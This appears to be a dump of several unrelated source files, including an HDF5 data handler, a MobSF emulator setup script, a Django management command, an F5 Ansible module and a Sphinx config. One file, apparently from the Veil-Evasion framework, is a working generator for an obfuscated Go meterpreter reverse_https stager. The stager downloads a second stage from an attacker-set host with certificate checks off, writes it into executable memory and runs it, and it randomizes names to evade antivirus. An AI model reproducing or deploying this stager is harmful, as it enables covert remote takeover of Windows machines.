def put(self, data, dset_path, **kwargs):
"""
Parameters
----------
data : any valid data type.
What is meant by "valid" here, is that <data> must be
convertible with:
>>> numpy.array(data)
so this includes things such as:
scalars : bool, int, float
numpy.int, numpy.float, etc..
lists : [int, int, ...]
[(float, float), (float, float)]
tuples : (float, float, ...)
However, "valid" in the HDF5Handler also means <data> must also
be numeric. This means that the following should not throw a
TypeError:
>>> numpy.array(data)/1.0
Which it will (or should), if <data> contains strings.
dset_path : str
unix-style path ( 'group/datasetname' )
Valid keyword arguments are:
dtype
chunksize
blockfactor
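These keyword arguments are only honoured on the first put() for a given
path (when the underlying dataset is created) and are passed straight to
create_dset. A small illustrative sketch:
>>> handler.put([1.0, 2.0], '/somepath/pairs', dtype='float32', chunksize=500)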
"""
if self.prefix:
fulldsetpath = self.prefix+dset_path
else:
fulldsetpath = dset_path
try:
converter = self.index_converters[fulldsetpath]
ndarray = converter(data)
self.index[fulldsetpath].append_to_dbuffer(ndarray)
except KeyError:
self.create_dset(data, fulldsetpath, **kwargs)
self.put(data, dset_path, **kwargs)
def create_dset(self, data, dset_path, chunksize=1000, blockfactor=100,
dtype='float64'):
"""
Define h5py dataset parameters here.
Parameters
----------
dset_path : str
A POSIX-style path which will be used as the location for the h5py
dataset, for example 'somegroup/somedataset'.
data: any valid data. See HDF5Handler.put.__doc__
blockfactor : int
Used to calculate blocksize. (blocksize = blockfactor*chunksize)
chunksize : int
Determines the buffersize. (e.g.: if chunksize = 1000, the buffer
will be written to the dataset after 1000 HDF5Handler.put()
calls.) You want to make sure that the buffer size stays between
10 KiB and 1 MiB (1048576 bytes).
This has serious performance implications if chosen too big or
too small, so I'll repeat that:
MAKE SURE YOU CHOOSE YOUR CHUNKSIZE SUCH THAT THE BUFFER
DOES NOT EXCEED 1048576 bytes.
See h5py docs on chunked storage for more info:
http://docs.h5py.org/en/latest/high/dataset.html#chunked-storage
#TODO: Show an example of how you would approximate a good chunksize
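As a rough way to approximate one (illustrative numbers, not a rule):
the buffer holds about chunksize * bytes_per_element * elements_per_row
bytes, so for float64 rows of shape (3,),
>>> 1000 * 8 * 3   # chunksize * itemsize * elements per row
24000
i.e. roughly 23 KiB, comfortably inside the 10 KiB - 1 MiB window above.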
dtype : str
One of numpy's dtypes.
int8
int16
float16
float32
etc.
"""
arr_shape = get_shape(data)
converter = get_ndarray_converter(data)
blocksize = blockfactor * chunksize
chunkshape = sum(((chunksize,), arr_shape), ())
maxshape = sum(((None,), arr_shape), ())
dsetkw = dict(chunks=chunkshape, maxshape=maxshape, dtype=dtype)
init_shape = sum(((blocksize,), arr_shape), ())
dset = self.file.create_dataset(dset_path, shape=init_shape, **dsetkw)
self.index.update({dset_path: Dataset(dset)})
self.index_converters.update({dset_path: converter})
def flushbuffers(self):
"""
When the number of handler.put calls is not a multiple of buffersize,
then there will be unwritten arrays in dbuffer, since dbuffer is only
written when it is full. Call this method to write unwritten arrays in
all of the dbuffers.
"""
for dset in self.index.values():
dset.flush()
#TODO: a method to easily add a comment to the attrs of a dataset.
def add_comment(self):
"""
#TODO: write example of how you would like to use this
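One possible shape for it, purely as a hypothetical sketch (the method
currently does nothing):
>>> # handler.add_comment('/somepath/scalars', 'scalars recorded per timestep')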
"""
pass
#TODO: an option to enable one of the lossless compression filters
# supported by h5py: gzip, lzf, szip
def compress_with(self):
"""
#TODO: write example of how you would like to use this
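A hypothetical sketch of how it might be called once implemented; h5py
itself exposes this via e.g. create_dataset(..., compression='gzip'):
>>> # handler.compress_with('gzip')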
"""
pass
class Dataset(object):
""" TODO: write docstring"""
def __init__(self, dset):
"""
Parameters
----------
dset: h5py Dataset
"""
self.dset = dset
self.chunkcounter = 0
self.blockcounter = 0
self.chunksize = dset.chunks[0]
self.blocksize = dset.shape[0]
self.arr_shape = dset.shape[1:]
self.dbuffer = list()
def append_to_dbuffer(self, array):
"""
Parameters
----------
array: ndarray
"""
self.dbuffer.append(array)
if len(self.dbuffer) == self.chunksize: # THEN WRITE AND CLEAR BUFFER
begin = self.blockcounter*self.blocksize + \
self.chunkcounter*self.chunksize
end = begin + self.chunksize
dbuffer_ndarray = numpy.array(self.dbuffer)
self.dset[begin:end, ...] = dbuffer_ndarray # WRITES BUFFER
self.dbuffer = list() # CLEARS BUFFER
if end == self.dset.shape[0]: #BLOCK IS FULL --> CREATE NEW BLOCK
new_shape = sum(((end+self.blocksize,), self.arr_shape), ())
self.dset.resize(new_shape)
self.blockcounter += 1
self.chunkcounter = 0
else:
self.chunkcounter += 1
else:
pass #wait till dbuffer is 'full'
def flush(self, trim=True):
"""
Flushes the dbuffer, i.e. writes arrays in the dbuffer and resizes the
dataset.
"""
dbuffer = self.dbuffer
dbuffer_ndarray = numpy.array(dbuffer)
begin = self.blockcounter*self.blocksize +\
self.chunkcounter*self.chunksize
end = begin + len(dbuffer)
self.dset[begin:end, ...] = dbuffer_ndarray
self.dbuffer = list()
if trim:
new_shape = sum(((end,), self.arr_shape), ())
self.dset.resize(new_shape)
def get_ndarray_converter(data):
"""
get_ndarray_converter will throw an exception if the data is not "numeric".
Otherwise, the following applies:
If the data is a numpy.ndarray, int, float, bool or numpy.number, this returns
the identity function; otherwise (e.g. a list or tuple) it returns numpy.array
(the function).
Parameters
----------
data: any valid data format. See HDF5Handler.put.__doc__
Return
------
identity OR numpy.array
"""
try:
numpy.array(data)/1.0
except TypeError:
raise Exception("{} contains non-numeric objects.".format(data))
def identity(data):
""" The identity function."""
return data
if isinstance(data, numpy.ndarray):
return identity
elif isinstance(data, (list, tuple)):
return numpy.array
elif isinstance(data, (int, float, bool, numpy.number)):
return identity
else:
msg = "type {} could not be converted to ndarray. ".format(type(data))
raise Exception(msg)
def get_shape(data):
"""
Parameters
----------
data: any valid data format. See HDF5Handler.put.__doc__
Return
------
returns () if it is a scalar, else it returns numpy.array(data).shape """
if isinstance(data, (int, float, bool, numpy.number)):
return ()
else:
return numpy.array(data).shape
|
ajinabraham/Mobile-Security-Framework-MobSF | refs/heads/master | scripts/mobsfy_AVD.py | 1 | #!/usr/bin/env python
# -*- coding: utf_8 -*-
import os
import platform
import subprocess
import sys
import getpass
import shutil
import io
import string
import re
import logging
logger = logging.getLogger(__name__)
BASE_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../")
def get_windows_drive():
drive = os.getenv('WINDIR')[:1] + ':'
if not drive:
return 'C:'
return drive
def print_log(msg, log_type='INFO'):
print('\n[' + log_type + '] ' + msg + '\n')
def execute_cmd(args, ret=False):
try:
logger.info("Executing Command - " + ' '.join(args))
if ret:
return subprocess.check_output(args)
else:
subprocess.call(args)
except Exception as e:
logger.error("Executing Command - " + str(e))
def verify_path(help_msg):
path = input(help_msg + ': ')
path = path.strip()
while not os.path.exists(path):
print_log('Path specified does not exist / no access', 'ERROR')
path = input(help_msg)
return path
def guess_android_avd_folder():
system = platform.system()
if system == 'Darwin':
username = getpass.getuser()
first_guess = os.path.join('/Users', username, '.android/avd')
if os.path.exists(first_guess):
return first_guess
elif system == "Linux":
for path in [os.path.expanduser('~/.android/avd/')]:
if os.path.exists(path):
return path
elif system == 'Windows':
username = getpass.getuser()
drive = get_windows_drive()
for path in [os.path.join(drive + '\\Documents and Settings', username, '.android\\avd'),
os.path.join(drive + '\\Users', username, '.android\\avd')]:
if os.path.exists(path):
return path
return False
def guess_android_sdk_folder():
system = platform.system()
username = getpass.getuser()
if system == 'Darwin':
for path in [os.path.join('/Users', username, 'Library/Android/Sdk/'),
os.path.join('/Users', username, 'Library/Android/sdk/')]:
if os.path.exists(path):
return path
elif system == "Linux":
for path in ['/usr/local/android-sdk',
'/usr/local/android',
'/usr/local/Android',
os.path.expanduser('~/Android/Sdk'),
os.path.expanduser('~/Android/sdk'),
os.path.expanduser('~/android/Sdk'),
os.path.expanduser('~/android/sdk')]:
if os.path.exists(path):
return path
elif system == 'Windows':
drive = get_windows_drive()
for path in [os.path.join(drive + '\\Users', username, 'AppData\\Local\\Android\\sdk'),
os.path.join(drive + '\\Users', username,
'AppData\\Local\\Android\\Sdk'),
os.path.join(drive + '\\Documents and Settings',
username, 'AppData\\Local\\Android\\sdk'),
os.path.join(drive + '\\Documents and Settings', username, 'AppData\\Local\\Android\\Sdk')]:
if os.path.exists(path):
return path
return False
def find_emulator_binary(sdk):
system = platform.system()
if system in ['Darwin', 'Linux']:
# Prefer emulator folder on tools folder
for path in [os.path.join(sdk, 'emulator', 'emulator'),
os.path.join(sdk, 'tools', 'emulator')]:
if os.path.exists(path):
return path
elif system == 'Windows':
for path in [os.path.join(sdk, 'emulator', 'emulator.exe'),
os.path.join(sdk, 'tools', 'emulator.exe')]:
if os.path.exists(path):
return path
return False
def find_adb_binary(sdk):
system = platform.system()
if system in ['Darwin', 'Linux']:
guess = os.path.join(sdk, 'platform-tools', 'adb')
if os.path.exists(guess):
return guess
elif system == 'Windows':
guess = os.path.join(sdk, 'platform-tools', 'adb.exe')
if os.path.exists(guess):
return guess
return False
def find_skin(sdk):
# Just a basic check
system = platform.system()
if system == 'Darwin':
guess = r'/Applications/Android Studio.app/Contents/plugins/android/lib/device-art-resources/nexus_5'
if os.path.exists(guess):
return guess
elif system in ['Windows', 'Linux']:
guess = os.path.join(sdk, 'skins', 'nexus_5')
if os.path.exists(guess):
return guess
return False
def is_file_exists(file_path):
"""Check if File Exists"""
return bool(os.path.isfile(file_path))
# returns an array of [str(tabs_string), str(rest_of_the_string)]
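# e.g. split_tabs("    AVD_PATH = ''") -> ["    ", "AVD_PATH = ''"], while an
# unindented line comes back as ['', line] (the input shown is only illustrative)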
def split_tabs(inp_string):
rgx = re.compile(r"([\s]+)(.*)")
match = rgx.match(inp_string)
if match:
return [match.group(1), match.group(2)]
else:
return ['', inp_string]
# path to modify, replace dict = {'field_to_replace1':'value1',
# 'field_to_replace2': 'value2'}
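# For .py files a matching line is rewritten as '<indent><field> = r"<value>"' with its
# original indentation kept; for plain ini-style files it becomes '<field>=<value>'.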
def replace_values_by_fieldnames(path, replace_dict):
replaced_lines = []
with io.open(path, mode='r', encoding="utf8", errors="ignore") as fild:
for line in fild.readlines():
tmp_line = line
if path.endswith('.py'):
tabs_and_str = split_tabs(line)
for field_to_replace in list(replace_dict.keys()):
# Python files has annoying tabs that we should consider
if path.endswith('.py'):
if tabs_and_str[1].lower().startswith(field_to_replace.lower()):
tmp_line = tabs_and_str[0] + field_to_replace + " = r\"" + replace_dict[
field_to_replace].strip(" \"'").lstrip("r\"") + "\"\n"
else:
if line.startswith(field_to_replace + '='):
tmp_line = field_to_replace + '=' + \
replace_dict[field_to_replace].strip() + '\n'
replaced_lines.append(tmp_line)
with io.open(path, 'w') as fild:
# newlines are validated before
fild.write(''.join(replaced_lines))
def main():
sdk_path = ''
avd_path = ''
adb_path = ''
emulator_binary = ''
mobsf_arm_folder = ''
settings_py = ''
print("\nMobSFy_AVD Script\n\n")
print_log('Starting MobSF - AVD interactive configuration script')
print_log('Make sure to run this script ONLY after you have successfully installed the latest Android Studio & downloaded MobSF_ARM_Emulator.zip')
# First gather all the paths needed for the copy operations
print_log('Please specify the path to MobSF_ARM_Emulator extracted folder')
mobsf_arm_folder = verify_path('MobSF_ARM_Emulator folder')
# Give the user the ability to change the sdk and avd folder, let me guess
# the other tools
print_log('This script will overwrite any previously generated files.')
guessd_sdk_path = guess_android_sdk_folder()
if guessd_sdk_path:
user_approve = input(
"Guessing Android sdk path: " + guessd_sdk_path + '\n Press Enter/alternative path')
if user_approve.strip() == '':
sdk_path = guessd_sdk_path
elif os.path.exists(user_approve):
sdk_path = user_approve
if not sdk_path:
sdk_path = verify_path('Android SDK path')
guessd_avd_path = guess_android_avd_folder()
if guessd_avd_path:
user_approve = input(
"Guessing Android AVD folder: " + guessd_avd_path + '\n Press Enter/alternative path')
if user_approve.strip() == '':
avd_path = guessd_avd_path
elif os.path.exists(user_approve):
avd_path = user_approve
if not avd_path:
avd_path = verify_path('Android AVD path')
emulator_binary = find_emulator_binary(sdk_path)
if not emulator_binary:
emulator_binary = verify_path('emulator binary')
adb_path = find_adb_binary(sdk_path)
if not adb_path:
adb_path = verify_path('adb binary')
settings_py = os.path.join(BASE_DIR, 'MobSF', 'settings.py')
if not os.path.exists(settings_py):
settings_py = verify_path('MobSF/settings.py file')
skin_path = find_skin(sdk_path)
if not skin_path:
skin_path = verify_path('nexus 5 skin path')
print_log('Finished finding all the paths needed')
################## Copy the downloaded emulator and system image #########
emulator_avd = os.path.join(mobsf_arm_folder, 'Nexus5API16.avd')
emulator_ini = os.path.join(mobsf_arm_folder, 'Nexus5API16.ini')
new_emulator_avd = os.path.join(avd_path, 'Nexus5API16.avd')
new_emulator_ini = os.path.join(avd_path, 'Nexus5API16.ini')
print_log('Copying emulator files to avd folder: ' + avd_path)
if is_file_exists(new_emulator_ini):
print_log("Replacing old Emulator INI")
os.remove(new_emulator_ini)
shutil.copyfile(emulator_ini, new_emulator_ini)
if os.path.isdir(new_emulator_avd):
print_log("Replacing old Emulator AVD")
shutil.rmtree(new_emulator_avd)
shutil.copytree(emulator_avd, new_emulator_avd)
system_images = os.path.join(sdk_path, 'system-images')
xposed_image_path = os.path.join(system_images, 'Xposed-android-16')
downloaded_xposed_image = os.path.join(
mobsf_arm_folder, 'Xposed-android-16')
if os.path.isdir(xposed_image_path):
print_log("Replacing old Xposed image")
shutil.rmtree(xposed_image_path)
shutil.copytree(downloaded_xposed_image, xposed_image_path)
################## Modify all the config files ###########################
print_log('Modifying config files')
# Nexus5API16.ini
replace_values_by_fieldnames(new_emulator_ini, {
'path': new_emulator_avd,
'skin.path': skin_path
})
# Nexus5API16.avd/config.ini
replace_values_by_fieldnames(os.path.join(new_emulator_avd, 'config.ini'), {
'skin.path': skin_path
})
# Nexus5API16.avd/hardware-qemu.ini
replace_values_by_fieldnames(os.path.join(new_emulator_avd, 'hardware-qemu.ini'), {
'hw.sdCard.path': os.path.join(new_emulator_avd, 'sdcard.img'),
'disk.cachePartition.path': os.path.join(new_emulator_avd, 'cache.img'),
'kernel.path': os.path.join(xposed_image_path, 'kernel-qemu'),
'disk.ramdisk.path': os.path.join(xposed_image_path, 'ramdisk.img'),
'disk.systemPartition.initPath': os.path.join(xposed_image_path, 'system.img'),
'disk.dataPartition.path': os.path.join(new_emulator_avd, 'userdata.img'),
})
replace_values_by_fieldnames(settings_py, {
'AVD_EMULATOR': emulator_binary,
'AVD_PATH': avd_path,
'ADB_BINARY': 'r"' + adb_path + '"'
})
print("\n\nAll Done! you can now use MobSF AVD Emulator :)\n\n")
if __name__ == '__main__':
sys.exit(main())
|
spasovski/zamboni | refs/heads/master | apps/applications/management/commands/addnewversion.py | 6 | from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError
import commonware.log
import amo.models
from applications.models import AppVersion
class Command(BaseCommand):
help = ('Add a new version to a Application. Syntax: \n'
' ./manage.py addnewversion <application_name> <version>')
log = commonware.log.getLogger('z.appversions')
def handle(self, *args, **options):
try:
do_addnewversion(args[0], args[1])
except IndexError:
raise CommandError(self.help)
msg = 'Adding version %r to application %r\n' % (args[1], args[0])
self.log.info(msg)
self.stdout.write(msg)
def do_addnewversion(application, version):
if application not in amo.APPS:
raise CommandError('Application %r does not exist.' % application)
try:
AppVersion.objects.create(application_id=amo.APPS[application].id,
version=version)
except IntegrityError, e:
raise CommandError('Version %r already exists: %r' % (version, e))
|
yfried/ansible | refs/heads/devel | lib/ansible/modules/network/f5/bigip_software_update.py | 11 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_software_update
short_description: Manage the software update settings of a BIG-IP
description:
- Manage the software update settings of a BIG-IP.
version_added: 2.5
options:
auto_check:
description:
- Specifies whether to automatically check for updates on the F5
Networks downloads server.
type: bool
auto_phone_home:
description:
- Specifies whether to automatically send phone home data to the
F5 Networks PhoneHome server.
type: bool
frequency:
description:
- Specifies the schedule for the automatic update check.
choices:
- daily
- monthly
- weekly
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Enable automatic update checking
bigip_software_update:
auto_check: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Disable automatic update checking and phoning home
bigip_software_update:
auto_check: no
auto_phone_home: no
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
auto_check:
description: Whether the system checks for updates automatically.
returned: changed
type: bool
sample: True
auto_phone_home:
description: Whether the system automatically sends phone home data.
returned: changed
type: bool
sample: True
frequency:
description: Frequency of auto update checks
returned: changed
type: string
sample: weekly
'''
from ansible.module_utils.basic import AnsibleModule
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
class Parameters(AnsibleF5Parameters):
api_map = {
'autoCheck': 'auto_check',
'autoPhonehome': 'auto_phone_home'
}
api_attributes = [
'autoCheck', 'autoPhonehome', 'frequency',
]
updatables = [
'auto_check', 'auto_phone_home', 'frequency',
]
returnables = [
'auto_check', 'auto_phone_home', 'frequency',
]
class ApiParameters(Parameters):
@property
def auto_check(self):
if self._values['auto_check'] is None:
return None
return self._values['auto_check']
class ModuleParameters(Parameters):
@property
def auto_check(self):
if self._values['auto_check'] is None:
return None
elif self._values['auto_check'] is True:
return 'enabled'
else:
return 'disabled'
@property
def auto_phone_home(self):
if self._values['auto_phone_home'] is None:
return None
elif self._values['auto_phone_home'] is True:
return 'enabled'
else:
return 'disabled'
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
pass
class ReportableChanges(Changes):
@property
def auto_check(self):
if self._values['auto_check'] == 'enabled':
return True
elif self._values['auto_check'] == 'disabled':
return False
@property
def auto_phone_home(self):
if self._values['auto_phone_home'] == 'enabled':
return True
elif self._values['auto_phone_home'] == 'disabled':
return False
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.have = None
self.want = ModuleParameters(params=self.module.params)
self.changes = UsableChanges()
def exec_module(self): # lgtm [py/similar-function]
result = dict()
changed = self.update()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def read_current_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/sys/software/update/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
def update_on_device(self):
params = self.changes.api_params()
uri = "https://{0}:{1}/mgmt/tm/sys/software/update/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
auto_check=dict(
type='bool'
),
auto_phone_home=dict(
type='bool'
),
frequency=dict(
choices=['daily', 'monthly', 'weekly']
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode
)
client = F5RestClient(**module.params)
try:
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
exit_json(module, results, client)
except F5ModuleError as ex:
cleanup_tokens(client)
fail_json(module, ex, client)
if __name__ == '__main__':
main()
|
marrocamp/V-u-Evasion- | refs/heads/master | modules/payloads/go/meterpreter/rev_https.py | 8 | """
Custom-written pure go meterpreter/reverse_https stager.
Module built by @b00stfr3ak44
"""
from modules.common import helpers
from random import randint
class Payload:
def __init__(self):
# required options
self.description = "pure windows/meterpreter/reverse_https stager, no shellcode"
self.language = "Go"
self.extension = "go"
self.rating = "Normal"
# options we require user ineraction for- format is {Option : [Value, Description]]}
self.required_options = {
"LHOST" : ["", "IP of the Metasploit handler"],
"LPORT" : ["8443", "Port of the Metasploit handler"],
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"]
}
def generate(self):
memCommit = helpers.randomString()
memReserve = helpers.randomString()
pageExecRW = helpers.randomString()
kernel32 = helpers.randomString()
procVirtualAlloc = helpers.randomString()
base64Url = helpers.randomString()
virtualAlloc = helpers.randomString()
size = helpers.randomString()
addr = helpers.randomString()
err = helpers.randomString()
randBase = helpers.randomString()
length = helpers.randomString()
foo = helpers.randomString()
random = helpers.randomString()
outp = helpers.randomString()
i = helpers.randomString()
randTextBase64URL= helpers.randomString()
getURI = helpers.randomString()
sumVar = helpers.randomString()
checksum8 = helpers.randomString()
uri = helpers.randomString()
value = helpers.randomString()
tr = helpers.randomString()
client = helpers.randomString()
hostAndPort = helpers.randomString()
port = self.required_options["LPORT"][0]
host = self.required_options["LHOST"][0]
response = helpers.randomString()
uriLength = randint(5, 255)
payload = helpers.randomString()
bufferVar = helpers.randomString()
x = helpers.randomString()
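# The Go source assembled below (a stager, not shellcode) fetches the second stage
# over HTTPS from LHOST:LPORT at a checksum-matched URI, copies it into RWX memory
# obtained through VirtualAlloc and then jumps into it via syscall.Syscall.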
payloadCode = "package main\nimport (\n\"crypto/tls\"\n\"syscall\"\n\"unsafe\"\n"
payloadCode += "\"io/ioutil\"\n\"math/rand\"\n\"net/http\"\n\"time\"\n)\n"
payloadCode += "const (\n"
payloadCode += "%s = 0x1000\n" %(memCommit)
payloadCode += "%s = 0x2000\n" %(memReserve)
payloadCode += "%s = 0x40\n)\n" %(pageExecRW)
payloadCode += "var (\n"
payloadCode += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" %(kernel32)
payloadCode += "%s = %s.NewProc(\"VirtualAlloc\")\n" %(procVirtualAlloc, kernel32)
payloadCode += "%s = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_\"\n)\n" %(base64Url)
payloadCode += "func %s(%s uintptr) (uintptr, error) {\n" %(virtualAlloc, size)
payloadCode += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" %(addr, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW)
payloadCode += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" %(addr, err, addr)
payloadCode += "func %s(%s int, %s []byte) string {\n" %(randBase, length, foo)
payloadCode += "%s := rand.New(rand.NewSource(time.Now().UnixNano()))\n" %(random)
payloadCode += "var %s []byte\n" %(outp)
payloadCode += "for %s := 0; %s < %s; %s++ {\n" %(i, i, length, i)
payloadCode += "%s = append(%s, %s[%s.Intn(len(%s))])\n}\n" %(outp, outp, foo, random, foo)
payloadCode += "return string(%s)\n}\n" %(outp)
payloadCode += "func %s(%s int) string {\n" %(randTextBase64URL, length)
payloadCode += "%s := []byte(%s)\n" %(foo, base64Url)
payloadCode += "return %s(%s, %s)\n}\n" %(randBase, length, foo)
payloadCode += "func %s(%s, %s int) string {\n" %(getURI, sumVar, length)
payloadCode += "for {\n%s := 0\n%s := %s(%s)\n" %(checksum8, uri, randTextBase64URL, length)
payloadCode += "for _, %s := range []byte(%s) {\n%s += int(%s)\n}\n" %(value, uri, checksum8, value)
payloadCode += "if %s%s == %s {\nreturn \"/\" + %s\n}\n}\n}\n" %(checksum8, '%0x100', sumVar, uri)
payloadCode += "func main() {\n"
payloadCode += "%s := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}\n" %(tr)
payloadCode += "%s := http.Client{Transport: %s}\n" %(client, tr)
payloadCode += "%s := \"https://%s:%s\"\n" %(hostAndPort, host, port)
payloadCode += "%s, _ := %s.Get(%s + %s(92, %s))\n" %(response, client, hostAndPort, getURI, uriLength)
payloadCode += "defer %s.Body.Close()\n" %(response)
payloadCode += "%s, _ := ioutil.ReadAll(%s.Body)\n" %(payload, response)
payloadCode += "%s, _ := %s(uintptr(len(%s)))\n" %(addr, virtualAlloc, payload)
payloadCode += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" %(bufferVar, addr)
payloadCode += "for %s, %s := range %s {\n" %(x, value, payload)
payloadCode += "%s[%s] = %s\n}\n" %(bufferVar, x, value)
payloadCode += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" %(addr)
return payloadCode
|
UDST/pandana | refs/heads/pyproject.toml | docs/source/conf.py | 1 | # -*- coding: utf-8 -*-
#
# pandana documentation build configuration file, created by
# sphinx-quickstart on Mon Aug 18 15:50:17 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
numpydoc_show_class_members = False
numpydoc_class_members_toctree = False
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.mathjax',
'numpydoc',
'sphinx.ext.autosummary'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'pandana'
copyright = '2021, UrbanSim Inc.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.6.1'
# The full version, including alpha/beta/rc tags.
release = '0.6.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
